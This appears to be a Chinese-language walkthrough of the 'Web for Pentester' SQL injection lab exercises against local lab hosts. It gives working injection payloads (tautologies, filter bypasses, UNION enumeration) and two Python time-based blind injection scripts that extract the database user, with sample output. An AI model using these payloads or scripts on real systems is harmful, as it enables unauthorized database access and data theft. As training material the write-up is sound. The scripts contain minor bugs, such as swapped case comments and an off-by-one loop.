web for pentester sqli

日期:2020-09-12

• example1

name=root 肯定是字符型注入 先闭合root 然后万能密码即可

http://192.168.239.134/sqli/example1.php?name=root' or '1'='1

• example2

这一题提示禁止使用空格，所以第一时间想到用**替代 但是发现也过滤了/ 所以可以使用|| 替代or 这样可以避免空格

http://192.168.239.134/sqli/example2.php?name=root'||'1'='1

• example3

这一题使用上面的解题方法一样可以注入

http://192.168.239.134/sqli/example3.php?name=root'||'1'='1

• example4

这一题是数字型注入 使用上面的解法去掉'即可

http://192.168.239.134/sqli/example4.php?id=1||1=1

• example5

第五题一样 使用上面的答案可以成功注入，应该是比较通用的解法

http://192.168.239.134/sqli/example5.php?id=1||1=1

• example6

遍历出列数
http://192.168.239.134/sqli/example6.php?id=1  order by 5

验证列数
http://192.168.239.134/sqli/example6.php?id=1 union select 1,2,3,4,5

版本信息
http://192.168.239.134/sqli/example6.php?id=1 union select 1,version(),4,3,5

表信息 这里的参数必须要以数字型结束
http://192.168.239.134/sqli/example6.php?id=1 union select 1,table_name,4,3,5 from information_schema.TABLES where 1=1 

• example7

这一题是单行匹配所以用%0A换行然后注入
example7.php?id=2%0AOrder%20by%206
使用上面的语句判断列数=6

example7.php?id=2%0Aunion%20select%201,2,3,4,5

• example8

通过order字段猜测可能是尾部拼接 
http://192.168.239.135/sqli/example8.php?order=id`%20desc--+
验证了猜想正确 因为无法通过显示返回想要的信息 所以只能通过时间盲注

下面是猜解脚本

import requests

"""
	通用延迟注入模型
"""

lower_char = range(65,91) # 26 个小写
upper_char = range(97,123) # 26个大写
number = range(48,57) #数字
other = ["_",'.','@']
def get_char():
	return list(lower_char)+list(upper_char)+list(other)+[ord(i) for i in other]

def httpReq(url,timeout=5):
	try:
		requests.get(url,timeout=timeout)
		return False
	except requests.exceptions.ReadTimeout:
		return True

def get_length():
	length = 1
	while length<30:
		url=f'''http://192.168.239.135/sqli/example8.php?order=id` And If(length(user())={length},sleep(11),1) --+'''
		status = httpReq(url)
		if status:
			print(f"长度为：{length}")
			return length
		length+=1
	print("未能解析出长度")
# get_length()
def dismantling(length):
	default=["*"]*length
	for index in range(0,length+1):
		for ch in get_char():
			url=f'''http://192.168.239.135/sqli/example8.php?order=id` And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
			print(url)
			status = httpReq(url)
			if status:
				default[index] = chr(ch)
				print(default)
				break
				print(default)
	print(f"dismantling:{default}")

dismantling(get_length())
output:
dismantling:['p', 'e', 'n', 't', 'e', 's', 't', 'e', 'r', 'l', 'a', 'b', '@', 'l', 'o', 'c', 'a', 'l', 'h', 'o', 's', 't']

• example9

和第八题一样也是可以延迟注入的(这里并没有对传入的值使用`包裹起来，可以不用考虑闭合问题)

payload

http://192.168.239.135/sqli/example9.php?order=name%20and(%20select(sleep(5)))

利用脚本

import requests

"""
	通用延迟注入模型
"""

lower_char = range(65,91) # 26 个小写
upper_char = range(97,123) # 26个大写
number = range(48,57) #数字
other = ["_",'.','@']
def get_char():
	return list(lower_char)+list(upper_char)+list(other)+[ord(i) for i in other]

def httpReq(url,timeout=5):
	try:
		requests.get(url,timeout=timeout)
		return False
	except requests.exceptions.ReadTimeout:
		return True

def get_length():
	length = 1
	while length<30:
		url=f'''http://192.168.239.135/sqli/example9.php?order=id And If(length(user())={length},sleep(11),1) --+'''
		status = httpReq(url)
		if status:
			print(f"长度为：{length}")
			return length
		length+=1
	print("未能解析出长度")
# get_length()
def dismantling(length):
	default=["*"]*length
	for index in range(0,length+1):
		for ch in get_char():
			url=f'''http://192.168.239.135/sqli/example9.php?order=id And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
			print(url)
			status = httpReq(url)
			if status:
				default[index] = chr(ch)
				print(default)
				break
				print(default)
	print(f"dismantling:{default}")
length=get_length()
dismantling(length)